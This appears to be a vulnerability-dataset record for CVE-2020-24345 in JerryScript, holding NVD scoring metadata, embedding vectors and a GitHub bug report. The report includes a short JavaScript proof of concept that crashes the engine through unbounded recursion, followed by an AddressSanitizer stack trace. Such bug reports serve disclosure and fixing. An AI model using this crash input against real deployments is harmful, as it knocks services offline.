-0.008815707638859749, -0.0017210993682965636, 0.004765868652611971, -0.00542606133967638, 0.02581649087369442, -0.005481898784637451, 0.013584860600531101, -0.009433201514184475, -0.0010962154483422637, 0.01333523541688919, -0.007889467291533947, 0.020272186025977135, -0.009801069274544716, 0.0068843974731862545, 0.057913023978471756, 0.004240341950207949, -0.019391929730772972, -0.00033502315636724234, 0.007771223317831755, -0.00474616140127182, -0.0037837910931557417, -0.01671174354851246, 0.018735021352767944, 0.005708531942218542, -0.022006424143910408, 0.009334664791822433, 0.029403209686279297, -0.013000212609767914, 0.03281913325190544, -0.0016570508014410734, -0.0001813682320062071, -0.023819489404559135, -0.0036786857526749372, 0.03108489327132702 ]
27
CVE-2020-24345
2020-08-13T19:15:13.807000
JerryScript through 2.3.0 allows stack consumption via function a(){new new Proxy(a,{})}JSON.parse("[]",a). NOTE: the vendor states that the problem is the lack of the --stack-limit option
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3977" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:*:*:*:*:*:*:*:*", "matchCriteriaId": "01F91CD4-9EFF-4338-A18E-64F109090995", "versionEndExcluding": null, "versionEndIncluding": "2.3.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jerryscript-project/jerryscript/issues/3977
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
### JerryScript revision git hash: 392ee717128f6daaf0b94e54fc9512eb26d680e2 ### Test case ```javascript function a() { new new Proxy(a, {}) } JSON.parse("[]", a) ``` ### Execution steps ./jerry poc.js ### Build cmd python tools/build.py --compile-flag="-fsanitize=address" Stack dump: --- ``` ASAN:DEADLYSIGNAL ================================================================= ==180140==ERROR: AddressSanitizer: stack-overflow on address 0x7fff1ed99fe8 (pc 0x5632f4db5751 bp 0x7fff1ed9a000 sp 0x7fff1ed99fe0 T0) #0 0x5632f4db5750 in ecma_is_lexical_environment /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/base/ecma-helpers.c:174 #1 0x5632f4db5c78 in ecma_get_lex_env_type /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/base/ecma-helpers.c:274 #2 0x5632f4ca68fa in ecma_op_resolve_reference_value /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-reference.c:276 #3 0x5632f4d219de in vm_loop.lto_priv.485 /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:1036 #4 0x5632f4cf8723 in vm_execute /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4670 #5 0x5632f4cf8d17 in vm_run /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4778 #6 0x5632f4da077e in ecma_op_function_call_simple /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:942 #7 0x5632f4da17ea in ecma_op_function_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:1366 #8 0x5632f4d7a201 in ecma_proxy_object_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-proxy-object.c:1779 #9 0x5632f4da1459 in ecma_op_function_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:1264 #10 0x5632f4d20f37 in opfunc_construct.lto_priv.481 /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:863 #11 0x5632f4cf87d8 in vm_execute /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4697 #12 0x5632f4cf8d17 in vm_run /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4778 #13 0x5632f4da077e in ecma_op_function_call_simple /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:942 #14 0x5632f4da17ea in ecma_op_function_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:1366 #15 0x5632f4d7a201 in ecma_proxy_object_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-proxy-object.c:1779 #16 0x5632f4da1459 in ecma_op_function_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:1264 #17 0x5632f4d20f37 in opfunc_construct.lto_priv.481 /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:863 #18 0x5632f4cf87d8 in vm_execute /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4697 #19 0x5632f4cf8d17 in vm_run /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4778 #20 0x5632f4da077e in ecma_op_function_call_simple /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:942 #21 0x5632f4da17ea in ecma_op_function_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:1366 #22 0x5632f4d7a201 in ecma_proxy_object_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-proxy-object.c:1779 #23 0x5632f4da1459 in ecma_op_function_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:1264 #24 0x5632f4d20f37 in opfunc_construct.lto_priv.481 /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:863 #25 0x5632f4cf87d8 in vm_execute /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4697 #26 0x5632f4cf8d17 in vm_run /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4778 #27 0x5632f4da077e in ecma_op_function_call_simple /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:942 #28 0x5632f4da17ea in ecma_op_function_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:1366 #29 0x5632f4d7a201 in ecma_proxy_object_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-proxy-object.c:1779 #30 0x5632f4da1459 in ecma_op_function_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:1264 #31 0x5632f4d20f37 in opfunc_construct.lto_priv.481 /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:863 #32 0x5632f4cf87d8 in vm_execute /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4697 #33 0x5632f4cf8d17 in vm_run /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4778 ``` ---
Stack overflow in ecma_is_lexical_environment
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3977/comments
1
2020-07-06T05:01:36
2020-07-06T13:02:51Z
https://github.com/jerryscript-project/jerryscript/issues/3977
651,247,064
3,977
true
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : Stack overflow in ecma_is_lexical_environment Issue date: --- start body --- ### JerryScript revision git hash: 392ee717128f6daaf0b94e54fc9512eb26d680e2 ### Test case ```javascript function a() { new new Proxy(a, {}) } JSON.parse("[]", a) ``` ### Execution steps ./jerry poc.js ### Build cmd python tools/build.py --compile-flag="-fsanitize=address" Stack dump: --- ``` ASAN:DEADLYSIGNAL ================================================================= ==180140==ERROR: AddressSanitizer: stack-overflow on address 0x7fff1ed99fe8 (pc 0x5632f4db5751 bp 0x7fff1ed9a000 sp 0x7fff1ed99fe0 T0) #0 0x5632f4db5750 in ecma_is_lexical_environment /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/base/ecma-helpers.c:174 #1 0x5632f4db5c78 in ecma_get_lex_env_type /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/base/ecma-helpers.c:274 #2 0x5632f4ca68fa in ecma_op_resolve_reference_value /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-reference.c:276 #3 0x5632f4d219de in vm_loop.lto_priv.485 /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:1036 #4 0x5632f4cf8723 in vm_execute /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4670 #5 0x5632f4cf8d17 in vm_run /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4778 #6 0x5632f4da077e in ecma_op_function_call_simple /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:942 #7 0x5632f4da17ea in ecma_op_function_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:1366 #8 0x5632f4d7a201 in ecma_proxy_object_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-proxy-object.c:1779 #9 0x5632f4da1459 in ecma_op_function_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:1264 #10 0x5632f4d20f37 in opfunc_construct.lto_priv.481 /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:863 #11 0x5632f4cf87d8 in vm_execute /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4697 #12 0x5632f4cf8d17 in vm_run /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4778 #13 0x5632f4da077e in ecma_op_function_call_simple /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:942 #14 0x5632f4da17ea in ecma_op_function_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:1366 #15 0x5632f4d7a201 in ecma_proxy_object_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-proxy-object.c:1779 #16 0x5632f4da1459 in ecma_op_function_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:1264 #17 0x5632f4d20f37 in opfunc_construct.lto_priv.481 /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:863 #18 0x5632f4cf87d8 in vm_execute /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4697 #19 0x5632f4cf8d17 in vm_run /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4778 #20 0x5632f4da077e in ecma_op_function_call_simple /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:942 #21 0x5632f4da17ea in ecma_op_function_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:1366 #22 0x5632f4d7a201 in ecma_proxy_object_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-proxy-object.c:1779 #23 0x5632f4da1459 in ecma_op_function_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:1264 #24 0x5632f4d20f37 in opfunc_construct.lto_priv.481 /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:863 #25 0x5632f4cf87d8 in vm_execute /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4697 #26 0x5632f4cf8d17 in vm_run /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4778 #27 0x5632f4da077e in ecma_op_function_call_simple /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:942 #28 0x5632f4da17ea in ecma_op_function_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:1366 #29 0x5632f4d7a201 in ecma_proxy_object_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-proxy-object.c:1779 #30 0x5632f4da1459 in ecma_op_function_construct /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/ecma/operations/ecma-function-object.c:1264 #31 0x5632f4d20f37 in opfunc_construct.lto_priv.481 /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:863 #32 0x5632f4cf87d8 in vm_execute /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4697 #33 0x5632f4cf8d17 in vm_run /home/yongheng/SQLFuzzer/jerry_clean/jerry-core/vm/vm.c:4778 ``` --- --- end body ---
4,990
[ -0.040472544729709625, -0.007293129339814186, -0.016229374334216118, 0.007876868359744549, 0.010831594467163086, -0.015292510390281677, 0.007246286142617464, 0.027601467445492744, -0.023767530918121338, 0.014737598598003387, -0.009123618714511395, 0.00974339060485363, -0.008201166987419128, 0.0050626713782548904, 0.03568732738494873, 0.01249633077532053, -0.014398885890841484, -0.01439167931675911, -0.016849147155880928, -0.017166240140795708, 0.0060824123211205006, -0.004291560035198927, -0.03415951877832413, 0.0424615815281868, -0.004529379308223724, -0.0035186465829610825, 0.03015262261033058, 0.0008783104130998254, -0.0064067114144563675, 0.006543637719005346, 0.0023890044540166855, 0.007711115293204784, -0.02891307882964611, 0.012719736434519291, 0.020524539053440094, 0.04667026177048683, 0.02875453233718872, 0.04277867078781128, -0.007318352814763784, 0.005887832958251238, 0.011847731657326221, -0.03392890840768814, -0.043153416365385056, 0.04122203588485718, 0.03522610291838646, 0.05079246684908867, 0.0298643559217453, 0.011191926896572113, -0.0534733422100544, 0.024473782628774643, 0.031363338232040405, -0.017886904999613762, 0.0029313047416508198, -0.07719763368368149, 0.0014971814816817641, -0.020870458334684372, 0.007487709168344736, 0.005127531010657549, 0.013944867067039013, 0.0086551858112216, 0.0016881576739251614, -0.0064535546116530895, -0.0042987666092813015, 0.0010512700537219644, 0.01981828734278679, 0.03222813829779625, -0.01383676752448082, -0.006709390785545111, 0.0290716253221035, 0.014103413559496403, 0.0025313356891274452, -0.008352506905794144, 0.03018144890666008, 0.042432751506567, 0.0133683355525136, 0.0041510299779474735, 0.0020376802422106266, 0.02329189144074917, -0.01666177436709404, -0.016474401578307152, -0.019688567146658897, 0.024589087814092636, -0.00758139556273818, 0.02937430329620838, 0.0025241291150450706, -0.008237200789153576, -0.012698116712272167, -0.06566698849201202, -0.011573879048228264, -0.00616889214143157, -0.017540985718369484, 0.031161552295088768, -0.013627774082124233, 0.023839596658945084, -0.012099964544177055, 0.008900212123990059, -0.044104695320129395, 0.006356264930218458, -0.03488018363714218, 0.0053509376011788845, -0.012914315797388554, -0.00006722452963003889, -0.013245821930468082, -0.009519984014332294, -0.012006278149783611, 0.03343885391950607, -0.007566981948912144, -0.026477230712771416, 0.04923583194613457, 0.11738190799951553, 0.0036627796944230795, -0.03502431884407997, -0.02843743935227394, -0.013296268880367279, -0.01745450496673584, 0.037964630872011185, -0.01282062940299511, -0.011134273372590542, -0.02088487148284912, 0.015595190227031708, -0.01901114173233509, -0.030613847076892853, 0.003837540978565812, -0.026650190353393555, -0.02735644206404686, 0.01633026823401451, 0.024286409839987755, -0.04419117420911789, 0.020178619772195816, -0.027889734134078026, -0.03946361318230629, -0.012215271592140198, 0.03476487845182419, -0.02594393864274025, 0.019832700490951538, 0.0015692479209974408, -0.004197873640805483, 0.04793863371014595, -0.00794172752648592, -0.02013537846505642, -0.03799345716834068, -0.027587054297327995, 0.004630272276699543, -0.01807427778840065, 0.019097622483968735, -0.010233442299067974, 0.009347024373710155, 0.03237226977944374, -0.04116438329219818, -0.00455820607021451, 0.008482227101922035, 0.0008134506060741842, 0.01303682941943407, 0.03188221901655197, 0.02249916084110737, -0.026016004383563995, 0.004932951647788286, 0.028797771781682968, 0.012467503547668457, 0.03407303988933563, -0.05528941750526428, -0.04113555699586868, -0.027615880593657494, -0.033554159104824066, -0.04765036702156067, -0.01667618751525879, 0.006849920377135277, 0.036062076687812805, -0.005974312778562307, 0.005163564346730709, -0.02182173542678356, 0.009476744569838047, 0.04321107268333435, 0.04522893205285072, -0.031824566423892975, -0.024271996691823006, 0.026448404416441917, 0.01320978906005621, 0.013988107442855835, -0.019746219739317894, 0.02764470875263214, -0.006442744750529528, -0.010846007615327835, 0.0067742508836090565, 0.03289115056395531, -0.02076956443488598, 0.008280440233647823, -0.043499335646629333, 0.00004126932981307618, -0.03753223270177841, -0.0038771776016801596, 0.001895348890684545, 0.014434919692575932, -0.01156667247414589, 0.022672120481729507, 0.007869661785662174, -0.0035078367218375206, -0.015955522656440735, -0.004147426690906286, -0.0009620877099223435, 0.02234061434864998, 0.0017241908935829997, -0.0534445121884346, 0.0036447630263864994, -0.025208860635757446, -0.015523123554885387, 0.0047383722849190235, -0.006269785109907389, 0.03398656100034714, -0.0007823719060979784, 0.00030740865622647107, -0.011840525083243847, 0.020178619772195816, -0.07252772152423859, -0.02954726293683052, -0.010809974744915962, 0.011148687452077866, -0.005873419344425201, -0.004796025343239307, 0.0006801275885663927, 0.017065346240997314, -0.03635033965110779, -0.011545052751898766, -0.025079140439629555, -0.020827217027544975, -0.011718012392520905, -0.014225926250219345, -0.002911486430093646, -0.02311893180012703, -0.0016719427658244967, 0.04381642863154411, 0.0014575448585674167, 0.009347024373710155, 0.00257457559928298, 0.02702493593096733, -0.02875453233718872, -0.023335130885243416, -0.010752321220934391, 0.03888707980513573, 0.01486011128872633, -0.0036105315666645765, -0.015033070929348469, -0.07414200901985168, -0.04312459006905556, -0.013152135536074638, 0.018737290054559708, -0.033900078386068344, 0.004060946870595217, -0.03211282938718796, 0.016777079552412033, -0.009873109869658947, -0.02339278534054756, -0.0032556040678173304, -0.03819524496793747, -0.016459988430142403, 0.021129896864295006, 0.021158723160624504, 0.03018144890666008, -0.03217048570513725, -0.0032790256664156914, 0.019775046035647392, 0.016719426959753036, -0.026001591235399246, 0.026924043893814087, -0.015609603375196457, 0.0048104384914040565, -0.013988107442855835, 0.02030833810567856, -0.006067999172955751, -0.012633256614208221, 0.03885825350880623, -0.04684322327375412, -0.00400689709931612, -0.005286077503114939, 0.015624016523361206, 0.004089773632586002, -0.0003851053479593247, -0.006716597359627485, 0.007689495105296373, -0.01006768923252821, 0.02780325524508953, 0.015955522656440735, 0.017699532210826874, 0.050705987960100174, 0.011429746635258198, 0.02548271231353283, 0.03505314514040947, -0.021331682801246643, 0.0008503846474923193, -0.031248033046722412, -0.02921575866639614, -0.006651737727224827, -0.007076929789036512, 0.004255526699125767, 0.020942524075508118, -0.004140220116823912, 0.001352147664874792, -0.0025115173775702715, -0.004504155833274126, -0.003421356901526451, 0.00455820607021451, -0.016157308593392372, 0.014370059594511986, 0.0032772240228950977, -0.05520293489098549, 0.01964532770216465, -0.021418163552880287, 0.0036249447148293257, -0.02688080258667469, 0.010240648873150349, 0.06630117446184158, -0.017800424247980118, -0.006540034431964159, -0.02626103162765503, 0.018636396154761314, 0.003783490974456072, 0.015941109508275986, -0.0007949835271574557, -0.024286409839987755, 0.007015673443675041, -0.04600725322961807, 0.009491157718002796, -0.03361181542277336, -0.002952924696728587, 0.04978353530168533, 0.01934264786541462, -0.02391166426241398, 0.004741975571960211, -0.045055974274873734, 0.015105137601494789, 0.011537846177816391, -0.043009284883737564, -0.032919976860284805, -0.006471571512520313, -0.03225696459412575, -0.021346095949411392, -0.030613847076892853, 0.019544433802366257, 0.013952073641121387, -0.02640516497194767, -0.014730392023921013, -0.0029421148356050253, -0.02261446602642536, 0.004536585882306099, 0.02072632499039173, -0.02324865199625492, 0.01517720427364111, 0.01605641469359398, 0.022715359926223755, 0.022081173956394196, 0.000978302676230669, 0.015624016523361206, 0.012063931673765182, 0.007415642496198416, 0.04574781283736229, -0.041250862181186676, -0.04263453930616379, -0.02466115541756153, 0.024733221158385277, 0.012662083841860294, -0.005786939524114132, -0.022830666974186897, 0.02532416768372059, -0.0035600848495960236, -0.003996087238192558, -0.003689804580062628, 0.0023565744049847126, 0.006644531153142452, -0.01794455759227276, -0.018362542614340782, -0.022268546745181084, 0.020466884598135948, -0.0016836535651236773, -0.003942037466913462, -0.01516279112547636, -0.03222813829779625, 0.019212927669286728, 0.0067742508836090565, -0.0164888147264719, 0.015133963897824287, -0.013894420117139816, -0.0021637964528054, 0.039377134293317795, -0.004187063314020634, -0.008431780152022839, 0.010363162495195866, -0.027731187641620636, 0.02876894548535347, 0.003996087238192558, 0.005336523987352848, -0.03862764313817024, 0.02280183881521225, -0.05687487870454788, -0.037503406405448914, -0.016474401578307152, 0.024574674665927887, -0.022672120481729507, -0.012849456630647182, 0.007001260295510292, -0.053502168506383896, -0.012006278149783611, -0.02183614857494831, -0.013346714898943901, 0.004994207993149757, -0.018304890021681786, 0.007264303043484688, -0.0032141658011823893, -0.019731806591153145, 0.019616499543190002, 0.007148996461182833, 0.024617915973067284, -0.047852154821157455, -0.044392962008714676, 0.004615859128534794, 0.04984118789434433, 0.022556813433766365, 0.038742948323488235, -0.012856663204729557, -0.017324786633253098, -0.0037222346290946007, -0.023075692355632782, -0.02043805830180645, 0.02261446602642536, 0.011047793552279472, 0.010485675185918808, -0.0036015231162309647, -0.00037879953742958605, 0.01124237384647131, 0.0010233442299067974, -0.005257250741124153, -0.0017350008711218834, -0.015825802460312843, 0.04274984449148178, 0.0345630906522274, -0.014975418336689472, -0.02937430329620838, -0.03499549254775047, -0.05520293489098549, -0.021735254675149918, -0.0018647206015884876, 0.018189582973718643, 0.018593156710267067, 0.005048258230090141, -0.04485418647527695, 0.00502663804218173, -0.035773809999227524, -0.050705987960100174, 0.0036537714768201113, 0.013317888602614403, -0.004226699937134981, 0.006633720826357603, 0.020236272364854813, -0.00054995744721964, 0.01202069129794836, 0.024156689643859863, 0.0019638119265437126, -0.04903404414653778, 0.0040105003863573074, -0.007076929789036512, 0.005120324436575174, 0.007502122316509485, 0.011415333487093449, 0.016777079552412033, -0.0033294721506536007, 0.004799628630280495, 0.03727279230952263, 0.013584534637629986, -0.024762047454714775, -0.009058758616447449, -0.030930940061807632, 0.039232999086380005, 0.018362542614340782, -0.021764082834124565, 0.03721513971686363, -0.010882041417062283, -0.013800733722746372, 0.024430543184280396, -0.02515120804309845, -0.004158237017691135, -0.011112653650343418, -0.00974339060485363, -0.01824723742902279, -0.03289115056395531, 0.031161552295088768, 0.020077725872397423, 0.012323371134698391, 0.01804545149207115, 0.013714253902435303, 0.04658378288149834, 0.029287824407219887, 0.018910247832536697, -0.00017228396609425545, -0.059008046984672546, -0.05606773495674133, 0.009678530506789684, -0.025093553587794304, -0.0393194817006588, -0.0034231585450470448, 0.02718348242342472, 0.013707047328352928, 0.014175480231642723, -0.07835069298744202, 0.031046247109770775, 0.024473782628774643, -0.00014582205039914697, -0.006417521741241217, -0.00632743863388896, 0.04338403046131134, -0.007833627983927727, -0.043326377868652344, 0.007487709168344736, -0.03268936276435852, 0.028206827118992805, 0.013584534637629986, -0.026664603501558304, -0.01666177436709404, 0.0068210940808057785, 0.0153357507660985, 0.05200318247079849, 0.028999557718634605, -0.021663188934326172, -0.01248191762715578, 0.005613979883491993, 0.023954903706908226, 0.04038606584072113, -0.00014559684495907277, 0.028264479711651802, -0.0024466575123369694, 0.00911641214042902, -0.021490229293704033, -0.026131311431527138, -0.003439373569563031, -0.04358581826090813, 0.043902911245822906, -0.007487709168344736, -0.010564948432147503, 0.010038862936198711, 0.04295163229107857, -0.0038123177364468575, -0.005466243717819452, 0.01532133761793375, 0.031507473438978195, -0.03266053646802902, 0.018031038343906403, 0.014024140313267708, -0.001770133269019425, -0.011444159783422947, -0.003963657189160585, 0.029777877032756805, 0.020048899576067924, -0.0090443454682827, -0.01870846189558506, 0.009152445010840893, 0.023839596658945084, 0.007195839658379555, -0.013101689517498016, -0.026765497401356697, 0.02591511234641075, 0.0011683780467137694, -0.020193032920360565, 0.006349058356136084, -0.0021692016161978245, -0.0013647592859342694, -0.0017250917153432965, -0.03888707980513573, -0.010874833911657333, 0.0015746529679745436, 0.051974356174468994, -0.04782332852482796, 0.01273414958268404, 0.026851976290345192, 0.011343266814947128, -0.0003945640637539327, -0.022816251963377, 0.007487709168344736, 0.02029392495751381, 0.019616499543190002, 0.004014103673398495, -0.0018935472471639514, -0.012287337332963943, 0.023623397573828697, -0.02170642837882042, 0.005801353137940168, 0.025367407128214836, -0.005977916065603495, -0.03251640498638153, 0.013692634180188179, 0.006305818445980549, 0.00879931915551424, -0.009318198077380657, -0.011472986079752445, -0.023450437933206558, -0.01162432599812746, -0.007689495105296373, 0.031392164528369904, -0.010946900583803654, 0.010564948432147503, 0.013656601309776306, 0.027774427086114883, -0.008604739792644978, 0.018117517232894897, 0.011775665916502476, 0.005257250741124153, -0.021778495982289314, -0.02923017181456089, 0.02167760208249092, 0.0028159983921796083, -0.013800733722746372, 0.03326589614152908, 0.014413299039006233, -0.02705376222729683, 0.03519727662205696, 0.023868422955274582, -0.004677115473896265, -0.012222478166222572, 0.004925745073705912, 0.0016881576739251614, 0.011509019881486893, -0.017339199781417847, 0.0072859227657318115, 0.02215324155986309, -0.03989601135253906, -0.01761305145919323, -0.0010089309653267264, -0.0046446858905255795, 0.051772572100162506, -0.005415797233581543, -0.02172084152698517, -0.017497746273875237, -0.006017552688717842, 0.011300026439130306, -0.026145724579691887, -0.012539570219814777, -0.014888938516378403, -0.004615859128534794, 0.03519727662205696, 0.00656165461987257, 0.034015387296676636, -0.019544433802366257, 0.001942192087881267, -0.0034231585450470448, 0.026030419394373894, -0.014571845531463623, -0.018967902287840843, -0.026621364057064056, 0.01015416905283928, -0.019270582124590874, -0.006067999172955751, 0.017368026077747345, 0.033727120608091354, 0.008684013038873672, -0.0036483663134276867, 0.009001105092465878, 0.01774277165532112, 0.008193960413336754, -0.007812008261680603, 0.044421788305044174, 0.03571615740656853, -0.01069466769695282, -0.006911177188158035, -0.04808276519179344, -0.012618843466043472, -0.019731806591153145, 0.01429078634828329, 0.02466115541756153, -0.021446989849209785, -0.010867627337574959, 0.028812184929847717, -0.0052032009698450565, 0.004796025343239307, -0.00507708452641964, 0.027601467445492744, -0.006518414709717035, 0.0004074009193573147, -0.004514966160058975, -0.007094946689903736, -0.013411574997007847, 0.016719426959753036, -0.031968697905540466, 0.030210275202989578, -0.018982315436005592, 0.012835043482482433, -0.00015651942521799356, 0.013505261391401291, -0.004803231917321682, 0.007689495105296373, -0.03003731556236744, 0.008273233659565449, -0.014096206985414028, 0.0028069899417459965, -0.023378372192382812, 0.028725706040859222, 0.03266053646802902, 0.0008467813604511321, -0.0011872955365106463, -0.02737085521221161, 0.011249580420553684, 0.004003293812274933, -0.011826111935079098, -0.025655671954154968, -0.017065346240997314, 0.02594393864274025, -0.02343602478504181, 0.030527368187904358, 0.0219946950674057, 0.0361773818731308, 0.006997657008469105, 0.0011008157161995769, 0.02925899811089039, 0.010817181318998337, -0.00023061278625391424, 0.02182173542678356, -0.01500424463301897, 0.021749667823314667, 0.022441506385803223, -0.03424599766731262, 0.01312330923974514, 0.004053740296512842, -0.0011440556263551116, 0.003978070802986622, -0.020668670535087585, -0.022758599370718002, -0.04053019732236862, -0.05015828087925911, 0.0017142817378044128, -0.0022773013915866613, -0.008237200789153576, 0.006576067768037319, -0.0049833981320261955, 0.009873109869658947, -0.01477363146841526, -0.03957891836762428, -0.0018250839784741402, 0.008864179253578186, -0.045200105756521225, 0.006449951324611902, 0.00047158513916656375, -0.011581085622310638, -0.01950119435787201, 0.008849766105413437, 0.010867627337574959, 0.013008002191781998, -0.009858696721494198, -0.023306304588913918, 0.011018967255949974, -0.025425059720873833, -0.0006751730106770992, 0.0017404059180989861, -0.021490229293704033, 0.004334799945354462, -0.010651428252458572, 0.022355027496814728, 0.012316164560616016, -0.010406401939690113, -0.00942629761993885, 0.01621496118605137, 0.004259129986166954, -0.020063312724232674, 0.01824723742902279, 0.030094968155026436, 0.011703599244356155, 0.01233778428286314, -0.017368026077747345, 0.0021421764977276325, -0.0012395437806844711, -0.007783181499689817, 0.025352993980050087, -0.038454681634902954, 0.005466243717819452, 0.008460606448352337, -0.000006358601694955723, -0.025338580831885338, -0.025828631594777107, -0.003365505486726761, 0.016416747123003006, -0.02830771915614605, -0.0016079837223514915, 0.03839702904224396, -0.01146577950567007, 0.004904124885797501, -0.0314498208463192, -0.0032231740187853575, -0.006911177188158035, 0.025698913261294365, -0.0003116875886917114, 0.013829560950398445, 0.01351967453956604, -0.014024140313267708, 0.01697886735200882, 0.0018809355096891522, -0.006817490793764591, -0.010968521237373352, 0.03724396601319313, 0.010550535283982754, 0.002823204966261983, -0.03692687302827835, -0.03352533280849457, 0.0013539493083953857, -0.0035636883694678545, -0.0204236451536417, 